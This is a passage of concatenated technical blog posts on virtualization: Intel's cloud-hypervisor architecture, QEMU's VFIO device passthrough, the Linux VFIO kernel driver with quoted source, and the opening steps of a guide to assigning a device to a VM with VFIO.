<p>Several months ago, Intel open sourced cloud-hypervisor. Its development is driven by the idea that the modern cloud needs a lighter, more secure and more efficient VMM. The traditional cloud virtualization stack is qemu plus kvm, but in the cloud we just need an environment to run workloads; there is no need to pay for the legacy devices that qemu emulates. Also, qemu is written in C, which many consider harmful for security; Rust is a memory-safe language and a good choice for building a next-generation VMM. Google implemented the first lightweight Rust-based VMM, crosvm, for Chrome OS. Then AWS developed its own lightweight VMM, Firecracker, based on crosvm. After the birth of crosvm and Firecracker, some companies realized that there was a lot of duplication between them, and that anyone writing a new Rust-based VMM would have to duplicate that work again. To avoid this, these companies set up the rust-vmm project. rust-vmm abstracts the common components a Rust-based VMM needs into crates: a kvm wrapper, virtio devices, various utilities, and so on. Anyone who wants to implement a Rust-based VMM can reuse these components, which makes writing one much easier.</p>
<p>Cloud-hypervisor was developed by Intel against this background. It reuses code from rust-vmm (vm-memory, kvm-ioctls), Firecracker and crosvm. The <a href="https://github.com/intel/cloud-hypervisor">cloud-hypervisor page</a> contains detailed usage info.</p>
<h3> Architecture </h3>
<p>As we know, qemu emulates a whole machine. Below is a diagram of the i440fx architecture (from the qemu site).</p>
<p><img src="/assets/img/cloud_hypervisor/1.png" alt="" /></p>
<p>As we can see, the topology qemu emulates is nearly the same as a physical machine: an i440fx motherboard, the PCI host bridge, the PCI bus tree, the Super I/O controller and the ISA bus tree.</p>
<p>However, we don’t need this complicated emulation. What cloud workloads mostly need is computing, networking and storage. So cloud-hypervisor has the following architecture.</p>
<p><img src="/assets/img/cloud_hypervisor/2.png" alt="" /></p>
<p>As we can see, cloud-hypervisor’s architecture is very simple; it doesn’t even abstract a motherboard. It has just several virtio devices, no ISA bus and no PCI bus tree. The following shows the PCI devices.</p>
<p><img src="/assets/img/cloud_hypervisor/4.png" alt="" /></p>
<h3> Some code </h3>
<p>The following diagram shows the basic function call chains.</p>
<p><img src="/assets/img/cloud_hypervisor/3.png" alt="" /></p>
<p>Some notes:</p>
<p>cloud-hypervisor uses several rust-vmm components, such as vm-memory (memory regions), vm-allocator (memory space and irq allocation), kvm-bindings (kvm ioctls), linux-loader (loading the kernel ELF file) and so on.</p>
<p>Like Firecracker, cloud-hypervisor loads the kernel into the VM’s address space and sets the vcpu’s instruction pointer to startup_64 (the entry point of vmlinux). cloud-hypervisor also implements a firmware loader.</p>
<p>Memory region and irq resources are managed with a BTree.</p>
<p>It implements one legacy device (i8042) to shut down the VM.</p>
<p>There are also some other interesting things in cloud-hypervisor/rust-vmm/firecracker/crosvm.</p>
<p>Anyway, cloud-hypervisor has a clean architecture; it avoids the complexity of the devices and buses that qemu has to emulate.</p>
qemu VM device passthrough using VFIO, the code analysis (2019-08-31) — http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/08/31/vfio-passthrough
<p>QEMU uses VFIO to assign physical devices to VMs. When using vfio, the qemu command line should add the following option:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> -device vfio-pci,host=00:12.0,id=net0
</code></pre></div></div>
<p>This adds a vfio-pci device and sets the physical device’s address via ‘host’. As we said in the <a href="https://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/08/21/vfio-driver-analysis">VFIO driver analysis</a> post, VFIO decomposes the physical device into a set of userspace APIs and recomposes the physical device’s resources. So most of the work in the vfio-pci device’s realize function, ‘vfio_realize’, is to decompose the physical device and connect the physical device’s resources to the virtual machine.</p>
<h3> Bind the device to a domain </h3>
<p>The physical device that will be assigned to the VM has been bound to vfio-pci, and the group file in ‘/dev/vfio/’ has been created. So ‘vfio_realize’ first checks the device and gets the device’s groupid, then calls ‘vfio_get_group’. The following is the call chain of this function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> vfio_get_group
->qemu_open("/dev/vfio/$groupid")
->vfio_connect_container
->qemu_open("/dev/vfio/vfio")
->vfio_init_container
->ioctl(VFIO_GROUP_SET_CONTAINER)
->ioctl(VFIO_SET_IOMMU)
->vfio_kvm_device_add_group
->memory_listener_register
</code></pre></div></div>
<p>‘vfio_get_group’ first opens the group file ‘/dev/vfio/$groupid’. ‘vfio_connect_container’ opens a new container and calls ‘vfio_init_container’ to add this vfio group to the container. After ‘vfio_init_container’, the device has been associated with a container and the iommu’s root table has been set up.</p>
<p>‘vfio_kvm_device_add_group’ bridges the ‘kvm’ subsystem and the ‘iommu’ subsystem. At the end of ‘vfio_connect_container’, a ‘vfio_memory_listener’ is registered to listen for memory layout change events. In the ‘region_add’ callback it calls ‘vfio_dma_map’ to set up the gpa(iova)->hpa mapping. When the guest uses a gpa in DMA programming, the iommu can translate this gpa to an hpa and access physical memory directly.</p>
<h3> Populate the device's resource </h3>
<p>After setting up the device’s DMA remapping, ‘vfio_realize’ gets the device’s resources and uses them to reconstruct the vfio-pci device.</p>
<p>First, ‘vfio_get_device’ gets the vfio device’s fd by calling ‘ioctl(VFIO_GROUP_GET_DEVICE_FD)’ with the assigned device’s name. Then ‘vfio_get_device’ calls ‘ioctl(VFIO_DEVICE_GET_INFO)’ on the device fd to get the basic info of the device.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct vfio_device_info {
__u32 argsz;
__u32 flags;
#define VFIO_DEVICE_FLAGS_RESET (1 << 0) /* Device supports reset */
#define VFIO_DEVICE_FLAGS_PCI (1 << 1) /* vfio-pci device */
#define VFIO_DEVICE_FLAGS_PLATFORM (1 << 2) /* vfio-platform device */
#define VFIO_DEVICE_FLAGS_AMBA (1 << 3) /* vfio-amba device */
#define VFIO_DEVICE_FLAGS_CCW (1 << 4) /* vfio-ccw device */
#define VFIO_DEVICE_FLAGS_AP (1 << 5) /* vfio-ap device */
__u32 num_regions; /* Max region index + 1 */
__u32 num_irqs; /* Max IRQ index + 1 */
};
</code></pre></div></div>
<p>Returning to ‘vfio_realize’: after ‘vfio_get_device’ it calls ‘vfio_populate_device’ to populate the device’s resources. ‘vfio_populate_device’ gets the info for the 6 BAR regions, the PCI config region and the VGA region (if present). ‘vfio_region_setup’ is called to populate each BAR region. Every region is stored in a ‘VFIORegion’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> typedef struct VFIORegion {
struct VFIODevice *vbasedev;
off_t fd_offset; /* offset of region within device fd */
MemoryRegion *mem; /* slow, read/write access */
size_t size;
uint32_t flags; /* VFIO region flags (rd/wr/mmap) */
uint32_t nr_mmaps;
VFIOMmap *mmaps;
uint8_t nr; /* cache the region number for debug */
} VFIORegion;
</code></pre></div></div>
<p>When we unbind the physical device from its driver and rebind it to the vfio-pci driver, the device’s resources are released. Here ‘fd_offset’ represents the offset of the region within the device fd, used when doing mmap. ‘mem’ is the MemoryRegion qemu uses to represent the IO region.</p>
<p>By calling ioctl(VFIO_DEVICE_GET_REGION_INFO) on the device fd we can get the region info; the most important fields are the region’s size, flags, fd_offset and index.</p>
<p>After getting the io region info, ‘vfio_populate_device’ gets the PCI configuration region.</p>
<p>Later, ‘vfio_realize’ calls ‘vfio_bars_prepare’ and ‘vfio_bars_register’ to mmap the device’s IO regions into userspace. ‘vfio_bars_prepare’ calls ‘vfio_bar_prepare’ for every IO region.
‘vfio_bar_prepare’ gets info about the IO region, such as whether it is ioport or mmio and the memory type of the region. ‘vfio_bars_register’ calls ‘vfio_bar_register’ on every IO region: it initializes a MemoryRegion and calls ‘vfio_region_mmap’ to mmap the device IO region into userspace. Finally, ‘vfio_bar_register’ calls ‘pci_register_bar’ to register the BAR for the vfio-pci device. Note that the parameters of ‘pci_register_bar’ come from the physical device.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void vfio_bar_register(VFIOPCIDevice *vdev, int nr)
{
VFIOBAR *bar = &vdev->bars[nr];
char *name;
if (!bar->size) {
return;
}
bar->mr = g_new0(MemoryRegion, 1);
name = g_strdup_printf("%s base BAR %d", vdev->vbasedev.name, nr);
memory_region_init_io(bar->mr, OBJECT(vdev), NULL, NULL, name, bar->size);
g_free(name);
if (bar->region.size) {
memory_region_add_subregion(bar->mr, 0, bar->region.mem);
if (vfio_region_mmap(&bar->region)) {
error_report("Failed to mmap %s BAR %d. Performance may be slow",
vdev->vbasedev.name, nr);
}
}
pci_register_bar(&vdev->pdev, nr, bar->type, bar->mr);
}
</code></pre></div></div>
<p>Following figure shows the data structure of VFIORegion.</p>
<p><img src="/assets/img/vfio3/1.png" alt="" /></p>
<p>Here we can see that the vfio-pci IO region is actually backed by qemu virtual memory: it is the IO region of the physical device mapped into userspace. For a normal qemu virtual device, the IO region is not backed by virtual memory, so when the guest accesses it, it traps into qemu via EPT misconfiguration. For a vfio-pci device, the IO region does have backing virtual memory, so when qemu sets up the EPT mapping, these IO regions are mapped as well. When the guest accesses the vfio-pci device’s IO region, it directly accesses the physical device’s IO region, because the userspace IO region of the vfio-pci device is mmapped from the physical device.</p>
<h3> Config the device </h3>
<p>‘vfio_populate_device’ also gets the PCI configuration region’s size and offset within the vfio device fd. In ‘vfio_realize’, after ‘vfio_populate_device’, ‘pread’ is called to read the device’s PCI config region and store it in ‘vdev->pdev.config’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ret = pread(vdev->vbasedev.fd, vdev->pdev.config,
MIN(pci_config_size(&vdev->pdev), vdev->config_size),
vdev->config_offset);
</code></pre></div></div>
<p>‘vfio_realize’ then allocates an ‘emulated_config_bits’ bitmap. Its bits indicate which parts of the PCI config space are emulated when the guest accesses the vfio-pci device’s config space: if a bit in ‘emulated_config_bits’ is set, ‘vdev->pdev.config’ is used; if it is not set, qemu accesses the physical device’s PCI config space.</p>
<p>‘vfio_realize’ configures the vfio-pci device according to the physical device, for example reading ‘PCI_VENDOR_ID’ into ‘vdev->vendor_id’ and ‘PCI_DEVICE_ID’ into ‘vdev->device_id’. ‘vfio_pci_size_rom’, ‘vfio_msix_early_setup’ and ‘vfio_add_capabilities’ also just operate on the PCI configuration region.</p>
<p>Then ‘vfio_realize’ sets up the device’s interrupt handling.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> if (vfio_pci_read_config(&vdev->pdev, PCI_INTERRUPT_PIN, 1)) {
vdev->intx.mmap_timer = timer_new_ms(QEMU_CLOCK_VIRTUAL,
vfio_intx_mmap_enable, vdev);
pci_device_set_intx_routing_notifier(&vdev->pdev, vfio_intx_update);
ret = vfio_intx_enable(vdev, errp);
if (ret) {
goto out_teardown;
}
}
</code></pre></div></div>
<p>Here ‘pci_device_set_intx_routing_notifier’ is called to register an ‘intx_routing_notifier’. We need this because the guest’s host bridge may change the assigned device’s INTx-to-irq routing.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int vfio_intx_enable(VFIOPCIDevice *vdev, Error **errp)
{
uint8_t pin = vfio_pci_read_config(&vdev->pdev, PCI_INTERRUPT_PIN, 1);
Error *err = NULL;
int32_t fd;
int ret;
if (!pin) {
return 0;
}
vfio_disable_interrupts(vdev);
vdev->intx.pin = pin - 1; /* Pin A (1) -> irq[0] */
pci_config_set_interrupt_pin(vdev->pdev.config, pin);
#ifdef CONFIG_KVM
/*
* Only conditional to avoid generating error messages on platforms
* where we won't actually use the result anyway.
*/
if (kvm_irqfds_enabled() && kvm_resamplefds_enabled()) {
vdev->intx.route = pci_device_route_intx_to_irq(&vdev->pdev,
vdev->intx.pin);
}
#endif
ret = event_notifier_init(&vdev->intx.interrupt, 0);
if (ret) {
error_setg_errno(errp, -ret, "event_notifier_init failed");
return ret;
}
fd = event_notifier_get_fd(&vdev->intx.interrupt);
qemu_set_fd_handler(fd, vfio_intx_interrupt, NULL, vdev);
if (vfio_set_irq_signaling(&vdev->vbasedev, VFIO_PCI_INTX_IRQ_INDEX, 0,
VFIO_IRQ_SET_ACTION_TRIGGER, fd, &err)) {
error_propagate(errp, err);
qemu_set_fd_handler(fd, NULL, NULL, vdev);
event_notifier_cleanup(&vdev->intx.interrupt);
return -errno;
}
vfio_intx_enable_kvm(vdev, &err);
if (err) {
warn_reportf_err(err, VFIO_MSG_PREFIX, vdev->vbasedev.name);
}
vdev->interrupt = VFIO_INT_INTx;
trace_vfio_intx_enable(vdev->vbasedev.name);
return 0;
}
</code></pre></div></div>
<p>‘vfio_intx_enable’ sets up the vfio-pci device’s interrupt. This function initializes an EventNotifier, ‘vdev->intx.interrupt’, whose read handler is ‘vfio_intx_interrupt’. Then ‘vfio_intx_enable’ calls ‘vfio_set_irq_signaling’ to set the fd as the interrupt eventfd. When the host device receives an interrupt, this eventfd is signaled and the fd’s handler, ‘vfio_intx_interrupt’, handles the interrupt. This is the common path, but it is not efficient, so ‘vfio_intx_enable_kvm’ is called.</p>
<p>kvm has a mechanism called irqfd. qemu can call ioctl(KVM_IRQFD) with a ‘kvm_irqfd’ argument to connect an irq with an fd.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct kvm_irqfd irqfd = {
.fd = event_notifier_get_fd(&vdev->intx.interrupt),
.gsi = vdev->intx.route.irq,
.flags = KVM_IRQFD_FLAG_RESAMPLE,
};
</code></pre></div></div>
<p>When the ‘fd’ is signaled, the kvm subsystem injects the ‘gsi’ interrupt into the VM. The irqfd bypasses userspace qemu and injects the interrupt directly in the kernel.</p>
<p>‘vfio_intx_enable_kvm’ sets up the interrupt fd’s irqfd. Notice the resample fd: the vfio interrupt handler in the kernel disables the interrupt after forwarding it. When the guest finishes dispatching the interrupt, it triggers an EOI, the resample fd is signaled, and vfio re-enables the interrupt.</p>
<p>After doing some quirk handling, ‘vfio_realize’ calls ‘vfio_register_err_notifier’ and ‘vfio_register_req_notifier’ to register two more EventNotifiers. The error EventNotifier is signaled when the physical device detects an unrecoverable error, and the req EventNotifier is signaled to request unplugging the vfio-pci device.</p>
VFIO driver analysis (2019-08-21) — http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/08/21/vfio-driver-analysis
<p>The VFIO driver is a framework for exposing direct device access to userspace.
Virtual machine technology uses VFIO to assign physical devices to VMs for the highest possible IO performance. In this post I will focus on the VFIO driver itself.</p>
<p>VFIO’s basic idea is showing in the following figure. This is from Alex’s talk <a href="http://www.linux-kvm.org/images/5/54/01x04-Alex_Williamson-An_Introduction_to_PCI_Device_Assignment_with_VFIO.pdf">An Introduction to PCI Device Assignment with VFIO</a>.</p>
<p><img src="/assets/img/vfio2/1.png" alt="" /></p>
<p>VFIO decomposes the physical device as a set of userspace API and recomposes the physical device’s resource to a virtual device in qemu.</p>
<p>There are three concepts in VFIO: Groups, Devices, and Containers.</p>
<p>Devices expose a programming interface made up of IO access, interrupts and DMA. Userspace (qemu) can use this interface to get the device’s information and configure the device.</p>
<p>A group is a set of devices which is isolatable from all other devices in the system. The group is the minimum granularity that can be assigned to a VM.</p>
<p>A container holds a set of groups. Different groups can be placed in the same container.</p>
<p>Following figure shows the relation of container, group and device.</p>
<p><img src="/assets/img/vfio2/2.png" alt="" /></p>
<p>Following figure shows the architecture of VFIO PCI.</p>
<p><img src="/assets/img/vfio2/3.png" alt="" /></p>
<h3> Bind device to vfio-pci driver </h3>
<p>In the ‘<a href="https://terenceli.github.io/技术/2019/08/16/vfio-usage">VFIO usage</a>’ post, we saw that before assigning a device to a VM, we first need to unbind it from its original driver and bind it to the vfio-pci driver.</p>
<p>The vfio-pci driver just registers ‘vfio_pci_driver’ in its ‘vfio_pci_init’ function.
When the assigned device is bound, the driver’s ‘probe’ callback, ‘vfio_pci_probe’, is called.</p>
<p>‘vfio_pci_probe’ first allocates and initializes a ‘vfio_pci_device’ struct, then calls ‘vfio_add_group_dev’ to create a ‘vfio_device’ and add it to a ‘vfio_group’. If the ‘vfio_group’ does not exist yet, ‘vfio_add_group_dev’ creates it.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int vfio_add_group_dev(struct device *dev,
const struct vfio_device_ops *ops, void *device_data)
{
struct iommu_group *iommu_group;
struct vfio_group *group;
struct vfio_device *device;
iommu_group = iommu_group_get(dev);
if (!iommu_group)
return -EINVAL;
group = vfio_group_get_from_iommu(iommu_group);
if (!group) {
group = vfio_create_group(iommu_group);
if (IS_ERR(group)) {
iommu_group_put(iommu_group);
return PTR_ERR(group);
}
} else {
/*
* A found vfio_group already holds a reference to the
* iommu_group. A created vfio_group keeps the reference.
*/
iommu_group_put(iommu_group);
}
device = vfio_group_get_device(group, dev);
if (device) {
WARN(1, "Device %s already exists on group %d\n",
dev_name(dev), iommu_group_id(iommu_group));
vfio_device_put(device);
vfio_group_put(group);
return -EBUSY;
}
device = vfio_group_create_device(group, dev, ops, device_data);
if (IS_ERR(device)) {
vfio_group_put(group);
return PTR_ERR(device);
}
/*
* Drop all but the vfio_device reference. The vfio_device holds
* a reference to the vfio_group, which holds a reference to the
* iommu_group.
*/
vfio_group_put(group);
return 0;
}
</code></pre></div></div>
<p>‘vfio_group’ is defined as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct vfio_group {
struct kref kref;
int minor;
atomic_t container_users;
struct iommu_group *iommu_group;
struct vfio_container *container;
struct list_head device_list;
struct mutex device_lock;
struct device *dev;
struct notifier_block nb;
struct list_head vfio_next;
struct list_head container_next;
struct list_head unbound_list;
struct mutex unbound_lock;
atomic_t opened;
};
</code></pre></div></div>
<p>‘vfio_create_group’ creates and initializes a ‘vfio_group’. It also creates a device file under ‘/dev/vfio/’ which represents the group; this file’s file_ops is ‘vfio_group_fops’, and ‘vfio_group’s ‘dev’ field is for this device. The ‘container’ field points to the container this group is attached to. ‘device_list’ links the group’s vfio devices. ‘iommu_group’ points to the low-level iommu group, the one created for the device when the IOMMU was set up. ‘vfio_group’ thus acts as a bridge between the vfio interface and the low-level iommu. Once created, the ‘vfio_group’ is linked into the global variable ‘vfio’s ‘group_list’.</p>
<p>In ‘vfio_add_group_dev’, after getting or creating a ‘vfio_group’, it creates a ‘vfio_device’ and adds it to the ‘vfio_group’. This is done by ‘vfio_group_create_device’. ‘vfio_device’ is defined as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct vfio_device {
struct kref kref;
struct device *dev;
const struct vfio_device_ops *ops;
struct vfio_group *group;
struct list_head group_next;
void *device_data;
};
</code></pre></div></div>
<p>Here ‘dev’ is the physical device. ‘ops’ is ‘vfio_pci_ops’, ‘group’ is the group just obtained or created, ‘group_next’ links this ‘vfio_device’ into the ‘vfio_group’s ‘device_list’, and ‘device_data’ is set to the ‘vfio_pci_device’ created in ‘vfio_pci_probe’.</p>
<p>When userspace issues ioctl(VFIO_GROUP_GET_DEVICE_FD) on the group fd, the corresponding handler ‘vfio_group_get_device_fd’ allocates a ‘file’ and an fd with the ‘vfio_device’ as the private data. This fd’s file_ops is ‘vfio_device_fops’, whose callbacks in most cases forward to the corresponding functions in ‘vfio_pci_ops’.</p>
<p>The following figure shows the relations among some of these data structures.</p>
<p><img src="/assets/img/vfio2/4.png" alt="" /></p>
<h3> VFIO kernel module initialization </h3>
<p>The VFIO core driver creates the ‘/dev/vfio/vfio’ device and manages VFIO for the whole system. It defines a ‘vfio’ global variable to store the vfio iommu drivers and iommu groups.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct vfio {
struct class *class;
struct list_head iommu_drivers_list;
struct mutex iommu_drivers_lock;
struct list_head group_list;
struct idr group_idr;
struct mutex group_lock;
struct cdev group_cdev;
dev_t group_devt;
wait_queue_head_t release_q;
} vfio;
</code></pre></div></div>
<p>All vfio iommu drivers are linked in ‘iommu_drivers_list’, and all vfio groups are linked in ‘group_list’.</p>
<p>In ‘vfio_init’, the driver initializes this ‘vfio’ struct and registers a misc device (‘vfio_dev’). It creates a ‘vfio’ device class and allocates the device numbers for the group nodes in ‘/dev/vfio/$group_id’.</p>
<p>‘/dev/vfio/vfio’s file_ops is ‘vfio_fops’, and its ‘open’ callback is ‘vfio_fops_open’. We can see that a ‘vfio_container’ is allocated and stored in the fd’s ‘private_data’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int vfio_fops_open(struct inode *inode, struct file *filep)
{
struct vfio_container *container;
container = kzalloc(sizeof(*container), GFP_KERNEL);
if (!container)
return -ENOMEM;
INIT_LIST_HEAD(&container->group_list);
init_rwsem(&container->group_lock);
kref_init(&container->kref);
filep->private_data = container;
return 0;
}
</code></pre></div></div>
<h3> Attach the group to container and Allocate IOMMU </h3>
<p>We now have a container fd (by opening the ‘/dev/vfio/vfio’ device) and a group fd (by opening ‘/dev/vfio/$gid’). We need to attach the group to the container, which is done by calling ioctl(VFIO_GROUP_SET_CONTAINER) on the group fd. The handler for this ioctl is ‘vfio_group_set_container’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int vfio_group_set_container(struct vfio_group *group, int container_fd)
{
struct fd f;
struct vfio_container *container;
struct vfio_iommu_driver *driver;
int ret = 0;
...
f = fdget(container_fd);
...
container = f.file->private_data;
WARN_ON(!container); /* fget ensures we don't race vfio_release */
down_write(&container->group_lock);
driver = container->iommu_driver;
if (driver) {
ret = driver->ops->attach_group(container->iommu_data,
group->iommu_group);
if (ret)
goto unlock_out;
}
group->container = container;
list_add(&group->container_next, &container->group_list);
/* Get a reference on the container and mark a user within the group */
vfio_container_get(container);
atomic_inc(&group->container_users);
unlock_out:
up_write(&container->group_lock);
fdput(f);
return ret;
}
</code></pre></div></div>
<p>The most important work here is to add the group to the container’s ‘group_list’. Also, if the container has already been set up with an iommu driver, ‘vfio_group_set_container’ attaches this group to that iommu driver.</p>
<p>Userspace can set the container’s iommu by calling ioctl(VFIO_SET_IOMMU) on the container fd. The handler for this ioctl is ‘vfio_ioctl_set_iommu’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static long vfio_ioctl_set_iommu(struct vfio_container *container,
unsigned long arg)
{
struct vfio_iommu_driver *driver;
long ret = -ENODEV;
down_write(&container->group_lock);
/*
* The container is designed to be an unprivileged interface while
* the group can be assigned to specific users. Therefore, only by
* adding a group to a container does the user get the privilege of
* enabling the iommu, which may allocate finite resources. There
* is no unset_iommu, but by removing all the groups from a container,
* the container is deprivileged and returns to an unset state.
*/
if (list_empty(&container->group_list) || container->iommu_driver) {
up_write(&container->group_lock);
return -EINVAL;
}
mutex_lock(&vfio.iommu_drivers_lock);
list_for_each_entry(driver, &vfio.iommu_drivers_list, vfio_next) {
void *data;
if (!try_module_get(driver->ops->owner))
continue;
/*
* The arg magic for SET_IOMMU is the same as CHECK_EXTENSION,
* so test which iommu driver reported support for this
* extension and call open on them. We also pass them the
* magic, allowing a single driver to support multiple
* interfaces if they'd like.
*/
if (driver->ops->ioctl(NULL, VFIO_CHECK_EXTENSION, arg) <= 0) {
module_put(driver->ops->owner);
continue;
}
/* module reference holds the driver we're working on */
mutex_unlock(&vfio.iommu_drivers_lock);
data = driver->ops->open(arg);
if (IS_ERR(data)) {
ret = PTR_ERR(data);
module_put(driver->ops->owner);
goto skip_drivers_unlock;
}
ret = __vfio_container_attach_groups(container, driver, data);
if (!ret) {
container->iommu_driver = driver;
container->iommu_data = data;
} else {
driver->ops->release(data);
module_put(driver->ops->owner);
}
goto skip_drivers_unlock;
}
mutex_unlock(&vfio.iommu_drivers_lock);
skip_drivers_unlock:
up_write(&container->group_lock);
return ret;
}
</code></pre></div></div>
<p>The vfio iommu drivers supported by the system are registered in ‘vfio.iommu_drivers_list’. A vfio iommu driver is the layer between vfio and the iommu hardware; we will take version 2 of the type1 vfio iommu as an example. ‘vfio_ioctl_set_iommu’ first calls the ‘open’ callback of the vfio iommu driver and gets back driver-specific data. It then passes this data to ‘__vfio_container_attach_groups’, which iterates over the groups in this container and calls the ‘attach_group’ callback of the vfio iommu driver for each.</p>
<p>‘vfio_iommu_driver_ops_type1’ is defined as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static const struct vfio_iommu_driver_ops vfio_iommu_driver_ops_type1 = {
.name = "vfio-iommu-type1",
.owner = THIS_MODULE,
.open = vfio_iommu_type1_open,
.release = vfio_iommu_type1_release,
.ioctl = vfio_iommu_type1_ioctl,
.attach_group = vfio_iommu_type1_attach_group,
.detach_group = vfio_iommu_type1_detach_group,
};
</code></pre></div></div>
<p>‘vfio_iommu_type1_open’ allocates and initializes a ‘vfio_iommu’ struct and returns it. ‘vfio_iommu’ is defined as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct vfio_iommu {
struct list_head domain_list;
struct mutex lock;
struct rb_root dma_list;
bool v2;
bool nesting;
};
</code></pre></div></div>
<p>‘domain_list’ links the ‘vfio_domain’ structures attached to the container. ‘dma_list’ records the IOVA mapping information.</p>
<p>‘vfio_iommu_type1_attach_group’ attaches an iommu_group to the vfio iommu. It allocates a new ‘vfio_group’ and ‘vfio_domain’. ‘vfio_domain’ holds an ‘iommu_domain’ which stores the hardware iommu information. The function then calls ‘iommu_attach_group’ to attach the iommu group to the iommu domain, which finally reaches ‘intel_iommu_attach_device’. Through ‘domain_add_dev_info’->‘dmar_insert_one_dev_info’->‘domain_context_mapping’…->‘domain_context_mapping_one’, the device’s info is written to the context table.
Notice that in ‘vfio_iommu_type1_attach_group’, if two domains share the same iommu configuration, different groups will be attached to the same ‘vfio_domain’.</p>
<p>The following figure shows the relations among some of these data structures.</p>
<p><img src="/assets/img/vfio2/5.png" alt="" /></p>
<h3> IOVA map </h3>
<p>Userspace can set up the iova(GPA)->HPA mapping by calling ioctl(VFIO_IOMMU_MAP_DMA) on the container fd.
The argument of ‘VFIO_IOMMU_MAP_DMA’ is a ‘vfio_iommu_type1_dma_map’, defined as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct vfio_iommu_type1_dma_map {
__u32 argsz;
__u32 flags;
#define VFIO_DMA_MAP_FLAG_READ (1 << 0) /* readable from device */
#define VFIO_DMA_MAP_FLAG_WRITE (1 << 1) /* writable from device */
__u64 vaddr; /* Process virtual address */
__u64 iova; /* IO virtual address */
__u64 size; /* Size of mapping (bytes) */
};
</code></pre></div></div>
<p>The ‘vaddr’ is a virtual address in the qemu process, and the ‘iova’ is the I/O virtual address from the device’s point of view. The handler for this ioctl is ‘vfio_dma_do_map’. It pins the physical pages backing the qemu virtual address range and then calls ‘vfio_iommu_map’ to establish the iova-to-HPA mapping. That calls ‘iommu_map’, which finally invokes the ‘iommu_ops’ map callback, ‘intel_iommu_map’, to complete the mapping work.</p>
VFIO usage2019-08-16T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/08/16/vfio-usage
<p>VFIO is used to assign a physical IO device to a virtual machine. I will write some posts to explain how VFIO works internally. First of all, we need to know how to use VFIO. We will create a VMware Workstation virtual machine (VM1); inside VM1 we will create a qemu virtual machine (VM2) and assign one of VM1’s devices to VM2.</p>
<h3> 1 </h3>
<p>Create a new network device for VM1 in VMware workstation, open the .vmx file with editor and change this new network’s type from e1000 to vmxnet3.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ethernet1.virtualDev = "vmxnet3"
</code></pre></div></div>
<h3> 2 </h3>
<p>Find the PCI address(BDF) in system(lspci -v)</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 03:00.0 Ethernet controller: VMware VMXNET3 Ethernet Controller (rev 01)
</code></pre></div></div>
<h3> 3 </h3>
<p>Find the device’s iommu group; the groups are generated during IOMMU initialization.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> test@ubuntu:~$ ls -lh /sys/bus/pci/devices/0000:03:00.0/iommu_group/devices
total 0
lrwxrwxrwx 1 root root 0 Aug 16 08:22 0000:00:15.0 -> ../../../../devices/pci0000:00/0000:00:15.0
lrwxrwxrwx 1 root root 0 Aug 16 08:22 0000:00:15.1 -> ../../../../devices/pci0000:00/0000:00:15.1
lrwxrwxrwx 1 root root 0 Aug 16 08:22 0000:00:15.2 -> ../../../../devices/pci0000:00/0000:00:15.2
lrwxrwxrwx 1 root root 0 Aug 16 08:22 0000:00:15.3 -> ../../../../devices/pci0000:00/0000:00:15.3
lrwxrwxrwx 1 root root 0 Aug 16 08:22 0000:00:15.4 -> ../../../../devices/pci0000:00/0000:00:15.4
lrwxrwxrwx 1 root root 0 Aug 16 08:22 0000:00:15.5 -> ../../../../devices/pci0000:00/0000:00:15.5
lrwxrwxrwx 1 root root 0 Aug 16 08:22 0000:00:15.6 -> ../../../../devices/pci0000:00/0000:00:15.6
lrwxrwxrwx 1 root root 0 Aug 16 08:22 0000:00:15.7 -> ../../../../devices/pci0000:00/0000:00:15.7
lrwxrwxrwx 1 root root 0 Aug 16 08:22 0000:03:00.0 -> ../../../../devices/pci0000:00/0000:00:15.0/0000:03:00.0
</code></pre></div></div>
<p>In general, the devices in the same iommu group should be assigned to the same domain. However, in this example, only our vmxnet3 network card is an endpoint device; the others are all PCI bridges, and vfio-pci does not currently support PCI bridges.</p>
<h3> 4 </h3>
<p>Unbind the device with the driver</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> echo 0000:03:00.0 > /sys/bus/pci/devices/0000:03:00.0/driver/unbind
</code></pre></div></div>
<h3> 5 </h3>
<p>Find the vendor and device ID</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> test@ubuntu:~$ lspci -n -s 0000:03:00.0
03:00.0 0200: 15ad:07b0 (rev 01)
</code></pre></div></div>
<h3> 6 </h3>
<p>Bind the device to vfio-pci driver(should modprobe vfio-pci firstly)</p>
